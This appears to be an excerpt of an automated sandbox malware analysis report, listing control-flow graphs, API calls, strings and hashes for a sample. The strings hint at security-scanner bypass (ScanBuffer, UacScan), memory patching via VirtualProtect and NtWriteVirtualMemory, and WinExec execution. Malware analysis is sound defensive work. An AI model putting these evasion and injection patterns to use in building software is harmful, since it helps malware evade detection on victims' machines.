call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 * 16 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c746a4 * 2 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 ExitProcess 6069->6204 6205 2c95293-2c952a2 call 2c74898 6069->6205 6772 2c94ef9-2c95105 call 2c749a4 call 2c8c898 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 EnumSystemLocalesA GetCurrentProcess call 2c87ca8 GetCurrentProcess call 2c87ca8 GetCurrentProcess call 2c87ca8 GetCurrentProcess call 2c87ca8 GetCurrentProcess call 2c87ca8 GetCurrentProcess call 2c87ca8 6070->6772 6773 2c94ef4-2c94ef7 6070->6773 6205->6204 6216 2c952a8-2c9557b call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c8d190 call 2c7480c call 2c7494c call 2c746a4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c77e08 6205->6216 6540 2c95858-2c95a59 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c749a4 call 2c88170 6216->6540 6541 2c95581-2c95853 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c8cde8 call 2c74500 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c7480c call 2c7494c call 2c746a4 call 2c74798 call 2c7494c call 2c746a4 call 2c87df4 call 2c74d8c * 2 call 2c74734 call 2c8c6d4 6216->6541 6515->6514 6540->6204 6541->6540 6772->6069 6773->6772
                                                      APIs
                                                        • Part of subcall function 02C87DF4: LoadLibraryW.KERNEL32(?,00000000,02C87EC3), ref: 02C87E24
                                                        • Part of subcall function 02C87DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02C87EC3), ref: 02C87E2A
                                                        • Part of subcall function 02C87DF4: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,02C87EC3), ref: 02C87E43
                                                        • Part of subcall function 02C8D310: RegOpenKeyA.ADVAPI32(?,00000000,02CAF644), ref: 02C8D354
                                                        • Part of subcall function 02C8D310: RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000000), ref: 02C8D38C
                                                        • Part of subcall function 02C8D310: RegCloseKey.ADVAPI32(00000000), ref: 02C8D397
                                                      • WinExec.KERNEL32 ref: 02C93D37
                                                        • Part of subcall function 02C8A18C: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 02C8A24F
                                                      • RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC), ref: 02C942B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                      • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                      • API String ID: 897696978-872072817
                                                      • Opcode ID: 600888b6eae5c9492297a6ac984776a4775249821ce38baf810ab39f7696465f
                                                      • Instruction ID: 40620c3c0c70f1a2fd9c2a0e9fe652c37a2230e6339f866ad49ac2b2fd1baaef
                                                      • Opcode Fuzzy Hash: 600888b6eae5c9492297a6ac984776a4775249821ce38baf810ab39f7696465f
                                                      • Instruction Fuzzy Hash: 7E92D075B901598FDB28EBA8CD80E9EB7BABF85304F1045E6E009A7254DF30AE55DF10

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 7460 2d26ac49-2d26ac62 7461 2d26ac64-2d26ac74 call 2d266766 7460->7461 7462 2d26ac78-2d26ac7d 7460->7462 7461->7462 7469 2d26ac76 7461->7469 7464 2d26ac7f-2d26ac87 7462->7464 7465 2d26ac8a-2d26acae MultiByteToWideChar 7462->7465 7464->7465 7467 2d26acb4-2d26acc0 7465->7467 7468 2d26ae41-2d26ae54 call 2d254fcb 7465->7468 7470 2d26ad14 7467->7470 7471 2d26acc2-2d26acd3 7467->7471 7469->7462 7473 2d26ad16-2d26ad18 7470->7473 7474 2d26acd5-2d26ace4 call 2d277190 7471->7474 7475 2d26acf2-2d26ad03 call 2d266137 7471->7475 7478 2d26ae36 7473->7478 7479 2d26ad1e-2d26ad31 MultiByteToWideChar 7473->7479 7474->7478 7488 2d26acea-2d26acf0 7474->7488 7475->7478 7485 2d26ad09 7475->7485 7483 2d26ae38-2d26ae3f call 2d255e40 7478->7483 7479->7478 7482 2d26ad37-2d26ad49 call 2d268bb3 7479->7482 7490 2d26ad4e-2d26ad52 7482->7490 7483->7468 7489 2d26ad0f-2d26ad12 7485->7489 7488->7489 7489->7473 7490->7478 7492 2d26ad58-2d26ad5f 7490->7492 7493 2d26ad61-2d26ad66 7492->7493 7494 2d26ad99-2d26ada5 7492->7494 7493->7483 7497 2d26ad6c-2d26ad6e 7493->7497 7495 2d26ada7-2d26adb8 7494->7495 7496 2d26adf1 7494->7496 7498 2d26add3-2d26ade4 call 2d266137 7495->7498 7499 2d26adba-2d26adc9 call 2d277190 7495->7499 7500 2d26adf3-2d26adf5 7496->7500 7497->7478 7501 2d26ad74-2d26ad8e call 2d268bb3 7497->7501 7505 2d26ae2f-2d26ae35 call 2d255e40 7498->7505 7516 2d26ade6 7498->7516 7499->7505 7514 2d26adcb-2d26add1 7499->7514 7504 2d26adf7-2d26ae10 call 2d268bb3 7500->7504 7500->7505 7501->7483 7513 2d26ad94 7501->7513 7504->7505 7517 2d26ae12-2d26ae19 7504->7517 7505->7478 7513->7478 7518 2d26adec-2d26adef 7514->7518 7516->7518 7519 2d26ae55-2d26ae5b 7517->7519 7520 2d26ae1b-2d26ae1c 7517->7520 7518->7500 7521 2d26ae1d-2d26ae2d WideCharToMultiByte 7519->7521 7520->7521 7521->7505 7522 2d26ae5d-2d26ae64 call 2d255e40 7521->7522 7522->7483
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$%-,2D25EA24,?,?,Pk)-N)-,2D26AE9A,00000001,00000001,73E85006), ref: 2D26ACA3
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,Pk)-N)-,2D26AE9A,00000001,00000001,73E85006,?,?,?), ref: 2D26AD29
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 2D26AE23
                                                      • __freea.LIBCMT ref: 2D26AE30
                                                        • Part of subcall function 2D266137: RtlAllocateHeap.NTDLL(00000000,2D2552BC,?,?,2D258847,?,?,00000000,2D296B50,?,2D22DE62,2D2552BC,?,?,?,?), ref: 2D266169
                                                      • __freea.LIBCMT ref: 2D26AE39
                                                      • __freea.LIBCMT ref: 2D26AE5E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID: $%-$Pk)-N)-
                                                      • API String ID: 1414292761-3860729615
                                                      • Opcode ID: d33d15ab41c7263690cd922c3a8cc4555db6a635d5d5ae85bbafe7652637d0fc
                                                      • Instruction ID: 66053b0045e0567ed7cf1846a17a06e9bc32b77496e13084319b8b111af0cdc2
                                                      • Opcode Fuzzy Hash: d33d15ab41c7263690cd922c3a8cc4555db6a635d5d5ae85bbafe7652637d0fc
                                                      • Instruction Fuzzy Hash: 3851B172698317ABEB158E64CC80EBB77A9EB44650F114679FE14F6180EB35ECD086F0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 7525 2c71724-2c71736 7526 2c7173c-2c7174c 7525->7526 7527 2c71968-2c7196d 7525->7527 7530 2c717a4-2c717ad 7526->7530 7531 2c7174e-2c7175b 7526->7531 7528 2c71973-2c71984 7527->7528 7529 2c71a80-2c71a83 7527->7529 7532 2c71986-2c719a2 7528->7532 7533 2c71938-2c71945 7528->7533 7535 2c71684-2c716ad VirtualAlloc 7529->7535 7536 2c71a89-2c71a8b 7529->7536 7530->7531 7534 2c717af-2c717bb 7530->7534 7537 2c71774-2c71780 7531->7537 7538 2c7175d-2c7176a 7531->7538 7539 2c719a4-2c719ac 7532->7539 7540 2c719b0-2c719bf 7532->7540 7533->7532 7542 2c71947-2c7195b Sleep 7533->7542 7534->7531 7541 2c717bd-2c717c9 7534->7541 7545 2c716df-2c716e5 7535->7545 7546 2c716af-2c716dc call 2c71644 7535->7546 7547 2c71782-2c71790 7537->7547 7548 2c717f0-2c717f9 7537->7548 7543 2c71794-2c717a1 7538->7543 7544 2c7176c-2c71770 7538->7544 7549 2c71a0c-2c71a22 7539->7549 7550 2c719c1-2c719d5 7540->7550 7551 2c719d8-2c719e0 7540->7551 7541->7531 7552 2c717cb-2c717de Sleep 7541->7552 7542->7532 7555 2c7195d-2c71964 Sleep 7542->7555 7546->7545 7553 2c7182c-2c71836 7548->7553 7554 2c717fb-2c71808 7548->7554 7562 2c71a24-2c71a32 7549->7562 7563 2c71a3b-2c71a47 7549->7563 7550->7549 7559 2c719e2-2c719fa 7551->7559 7560 2c719fc-2c719fe call 2c715cc 7551->7560 7552->7531 7558 2c717e4-2c717eb Sleep 7552->7558 7564 2c718a8-2c718b4 7553->7564 7565 2c71838-2c71863 7553->7565 7554->7553 7561 2c7180a-2c7181e Sleep 7554->7561 7555->7533 7558->7530 7568 2c71a03-2c71a0b 7559->7568 7560->7568 7561->7553 7570 2c71820-2c71827 Sleep 7561->7570 7562->7563 7571 2c71a34 7562->7571 7574 2c71a49-2c71a5c 7563->7574 7575 2c71a68 7563->7575 7566 2c718b6-2c718c8 7564->7566 7567 2c718dc-2c718eb call 2c715cc 7564->7567 7572 2c71865-2c71873 7565->7572 7573 2c7187c-2c7188a 7565->7573 7577 2c718cc-2c718da 7566->7577 7578 2c718ca 7566->7578 7586 2c718fd-2c71936 7567->7586 7590 2c718ed-2c718f7 7567->7590 7570->7554 7571->7563 7572->7573 7580 2c71875 7572->7580 7581 2c7188c-2c718a6 call 2c71500 7573->7581 7582 2c718f8 7573->7582 7576 2c71a6d-2c71a7f 7574->7576 7583 2c71a5e-2c71a63 call 2c71500 7574->7583 7575->7576 7577->7586 7578->7577 7580->7573 7581->7586 7582->7586 7583->7576
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 02C717D0
                                                      • Sleep.KERNEL32(0000000A,00000000), ref: 02C717E6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: T
                                                      • API String ID: 3472027048-1611120390
                                                      • Opcode ID: b642279cd7e28c1d6edd52a6053f3f4e0b0cddc87ea4ef65c46fefad9a3ff7fd
                                                      • Instruction ID: 7a5592dcf6583aa1435c099fa5e690510ad44703009337fd673964d2d9099858
                                                      • Opcode Fuzzy Hash: b642279cd7e28c1d6edd52a6053f3f4e0b0cddc87ea4ef65c46fefad9a3ff7fd
                                                      • Instruction Fuzzy Hash: CAB1F072A003518FCB15CF29D884366BBE1EB85368F1D87AED45DCB385DBB09652CB90

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 7591 2c71a8c-2c71a9b 7592 2c71aa1-2c71aa5 7591->7592 7593 2c71b6c-2c71b6f 7591->7593 7596 2c71aa7-2c71aae 7592->7596 7597 2c71b08-2c71b11 7592->7597 7594 2c71b75-2c71b7f 7593->7594 7595 2c71c5c-2c71c60 7593->7595 7599 2c71b81-2c71b8d 7594->7599 7600 2c71b3c-2c71b49 7594->7600 7603 2c71c66-2c71c6b 7595->7603 7604 2c716e8-2c7170b call 2c71644 VirtualFree 7595->7604 7601 2c71ab0-2c71abb 7596->7601 7602 2c71adc-2c71ade 7596->7602 7597->7596 7598 2c71b13-2c71b27 Sleep 7597->7598 7598->7596 7605 2c71b2d-2c71b38 Sleep 7598->7605 7608 2c71bc4-2c71bd2 7599->7608 7609 2c71b8f-2c71b92 7599->7609 7600->7599 7606 2c71b4b-2c71b5f Sleep 7600->7606 7610 2c71ac4-2c71ad9 7601->7610 7611 2c71abd-2c71ac2 7601->7611 7612 2c71af3 7602->7612 7613 2c71ae0-2c71af1 7602->7613 7620 2c71716 7604->7620 7621 2c7170d-2c71714 7604->7621 7605->7597 7606->7599 7614 2c71b61-2c71b68 Sleep 7606->7614 7616 2c71b96-2c71b9a 7608->7616 7618 2c71bd4-2c71bd9 call 2c714c0 7608->7618 7609->7616 7617 2c71af6-2c71b03 7612->7617 7613->7612 7613->7617 7614->7600 7622 2c71bdc-2c71be9 7616->7622 7623 2c71b9c-2c71ba2 7616->7623 7617->7594 7618->7616 7626 2c71719-2c71723 7620->7626 7621->7626 7622->7623 7625 2c71beb-2c71bf2 call 2c714c0 7622->7625 7627 2c71bf4-2c71bfe 7623->7627 7628 2c71ba4-2c71bc2 call 2c71500 7623->7628 7625->7623 7630 2c71c00-2c71c28 VirtualFree 7627->7630 7631 2c71c2c-2c71c59 call 2c71560 7627->7631
                                                      APIs
                                                      • Sleep.KERNEL32(00000000,?), ref: 02C71B17
                                                      • Sleep.KERNEL32(0000000A,00000000,?), ref: 02C71B31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: T
                                                      • API String ID: 3472027048-1611120390
                                                      • Opcode ID: e4447ac13f5b47de3407be400ced21773e6d7958a8b0972661acd5070481b79b
                                                      • Instruction ID: 3a9d7958bf1a1bad27c88ad196626ddbc8f135972a6577b5749e288c101ba0ab
                                                      • Opcode Fuzzy Hash: e4447ac13f5b47de3407be400ced21773e6d7958a8b0972661acd5070481b79b
                                                      • Instruction Fuzzy Hash: 1C51CFB1A512408FD715CF6CC984766BBD5EB85328F1C86AED44CCB292E7F0C645CBA1

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02C87DB1,?,?,00000000,00000000), ref: 02C87D6D
                                                      • GetProcAddress.KERNEL32(00000000,kernel32,00000000,00000000,02C87DB1,?,?,00000000,00000000), ref: 02C87D73
                                                      • VirtualProtect.KERNELBASE(?,?,?,?,00000000,kernel32,00000000,00000000,02C87DB1,?,?,00000000,00000000), ref: 02C87D8D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                      • String ID: irtualProtect$kernel32
                                                      • API String ID: 2099061454-2063912171
                                                      • Opcode ID: 73e54f1912c0135d1018583359ab436950eec63963a8e987f909b1b3b09fc7ed
                                                      • Instruction ID: 3c861b0b8816e24f5595dae5d424cb625e67de50d959b9ac910d36f83fff8830
                                                      • Opcode Fuzzy Hash: 73e54f1912c0135d1018583359ab436950eec63963a8e987f909b1b3b09fc7ed
                                                      • Instruction Fuzzy Hash: EE014479640604BFE710FFA8DC41E9EB7FDEB49714F618461F914D3680E634A9149F24
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,2D26850D,?,00000000,00000000,00000000,?,2D268839,00000006,FlsSetValue), ref: 2D268598
                                                      • GetLastError.KERNEL32(?,2D26850D,?,00000000,00000000,00000000,?,2D268839,00000006,FlsSetValue,2D27F160,2D27F168,00000000,00000364,?,2D2682E7), ref: 2D2685A4
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,2D26850D,?,00000000,00000000,00000000,?,2D268839,00000006,FlsSetValue,2D27F160,2D27F168,00000000), ref: 2D2685B2
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: b44af31d7faf1ade206ce4ae8c9edb05d65137a017e3c7825d4502a60d5a0ce7
                                                      • Instruction ID: 3b93f3d94c99f923501b6a5d043a969e8d62ed675b42615db29467b1d66810cd
                                                      • Opcode Fuzzy Hash: b44af31d7faf1ade206ce4ae8c9edb05d65137a017e3c7825d4502a60d5a0ce7
                                                      • Instruction Fuzzy Hash: BF01D8326563239BD7215A688C48F57B768BF05AA57124524ED05F72C0FB24D940CEF8
                                                      APIs
                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,2D25CE55), ref: 2D268C24
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: String
                                                      • String ID: LCMapStringEx$Pk)-N)-
                                                      • API String ID: 2568140703-292492752
                                                      • Opcode ID: a5fa72498e3088e68739dd2a447efa64dcbcea6c780a3b1a350e74853db2ccdc
                                                      • Instruction ID: 4759b151d806dc5e64eba17ff21f77ca47f488554bee56d27f17aa1fed7f8d79
                                                      • Opcode Fuzzy Hash: a5fa72498e3088e68739dd2a447efa64dcbcea6c780a3b1a350e74853db2ccdc
                                                      • Instruction Fuzzy Hash: CE013232545209FBCF129F90CC04EEEBF72EF49750F018424FE0835160CA369921ABA4
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(?,00000000,02C87EC3), ref: 02C87E24
                                                      • GetModuleHandleW.KERNEL32(?,?,00000000,02C87EC3), ref: 02C87E2A
                                                      • GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,02C87EC3), ref: 02C87E43
                                                        • Part of subcall function 02C87D2C: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02C87DB1,?,?,00000000,00000000), ref: 02C87D6D
                                                        • Part of subcall function 02C87D2C: GetProcAddress.KERNEL32(00000000,kernel32,00000000,00000000,02C87DB1,?,?,00000000,00000000), ref: 02C87D73
                                                        • Part of subcall function 02C87D2C: VirtualProtect.KERNELBASE(?,?,?,?,00000000,kernel32,00000000,00000000,02C87DB1,?,?,00000000,00000000), ref: 02C87D8D
                                                        • Part of subcall function 02C87B3C: GetModuleHandleW.KERNEL32(KernelBase,00000000,02C87C40,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C87BBE
                                                        • Part of subcall function 02C87B3C: GetProcAddress.KERNEL32(00000000,KernelBase,00000000,02C87C40,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C87BC4
                                                        • Part of subcall function 02C87B3C: GetCurrentProcess.KERNELBASE ref: 02C87BCE
                                                        • Part of subcall function 02C87A74: GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87AB8
                                                        • Part of subcall function 02C87A74: GetProcAddress.KERNEL32(00000000,ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87ABE
                                                        • Part of subcall function 02C87A74: NtWriteVirtualMemory.NTDLL(?,?,?,?,?,00000000,ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87ADC
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc$Virtual$CurrentLibraryLoadMemoryProcessProtectWrite
                                                      • String ID:
                                                      • API String ID: 3496194007-0
                                                      • Opcode ID: 833e19eddf9697959a16223da18efbb55df48e75d708ffe81c470ce8342f20c9
                                                      • Instruction ID: 0161ba517762354ff6973256f545ad94f8b8794e8faf51d423ed01cfec014359
                                                      • Opcode Fuzzy Hash: 833e19eddf9697959a16223da18efbb55df48e75d708ffe81c470ce8342f20c9
                                                      • Instruction Fuzzy Hash: D31191B5A40704BFE750FBA4DC52A5FB7AEFB44718F604568A208A7680EA399900EB14
                                                      APIs
                                                      • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,2D268839,00000006,FlsSetValue,2D27F160,2D27F168,00000000,00000364,?,2D2682E7,00000000), ref: 2D26852A
                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 2D268537
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                      • String ID:
                                                      • API String ID: 2279764990-0
                                                      • Opcode ID: 2d3b84a313abddb9f63b59d9a457a874882a10e61ff000b4f3eb7df8ee248bb2
                                                      • Instruction ID: fc6b084aedceae624a4d31a32647f15926a410afa7e6b12351480587ab0c24f4
                                                      • Opcode Fuzzy Hash: 2d3b84a313abddb9f63b59d9a457a874882a10e61ff000b4f3eb7df8ee248bb2
                                                      • Instruction Fuzzy Hash: 6711E7376413329BDB12DD1DCC40AABB3A5EB84B647138160EE14BB284F731EC818AF1
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02C71A03), ref: 02C715E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID: T
                                                      • API String ID: 4275171209-1611120390
                                                      • Opcode ID: 3fbb129994c1663b6f1caf83ae9f36f495e206e7b3fe7c9186e1c89d126dae99
